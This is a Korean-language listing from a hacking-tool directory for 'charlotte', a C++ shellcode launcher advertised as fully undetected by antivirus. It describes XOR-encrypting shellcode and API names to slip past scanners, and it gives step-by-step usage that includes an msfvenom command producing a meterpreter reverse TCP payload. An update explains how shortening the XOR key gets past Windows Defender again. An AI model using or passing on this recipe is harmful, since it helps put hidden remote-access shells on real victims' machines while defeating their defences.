Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/9emin1/charlotte
ExploitationIDS/IPS EvasionShellcodeMalware AnalysisPenetration TestingRed TeamingShellcode GenerationPayload DevelopmentAnti-Bot
GitHub9emin1/charlotte

charlotte

c++ 완전히 탐지되지 않는 셸코드 런처 ;)

저장소 보기
976207135년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

charlotte

c++ 완전 미탐지 쉘코드 런처 ;)

아이의 탄생을 축하하며 이걸 공개합니다

설명

13/05/2021:

  1. c++ 쉘코드 런처, 2021년 5월 13일 기준 완전 미탐지 0/26
  2. win32 API 함수 동적 호출
  3. 쉘코드 및 함수 이름 XOR 암호화
  4. 실행마다 무작위 XOR 키 및 변수
  5. Kali Linux에서는 'apt-get install mingw-w64*'만 하면 됩니다!

17/05/2021:

  1. 무작위 문자열 길이 및 XOR 키 길이

antiscan.me

alt_text

사용법

저장소를 클론하고, beacon.bin 이름으로 쉘코드 파일을 생성한 후 charlotte.py를 실행합니다.

예시:

  1. git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
  2. cd charlotte
  3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
  4. python charlotte.py
  5. 성공

msfvenom -p로 테스트됨 (아래 .gif POC 참조) 및 cobalt strike raw 형식 페이로드

alt_text

업데이트 v1.1

17/05/21:

분명히 Microsoft Windows Defender가 .DLL 바이너리를 탐지할 수 있었습니다.

그리고 어떻게 플래그를 지정했을까요? 16바이트 크기의 여러 XOR 키를 찾아서였습니다.

아래 POC .gif에 표시된 것처럼 9로 변경하면 다시 미탐지 상태가 됩니다.

축하합니다!

alt_text

도구 다운로드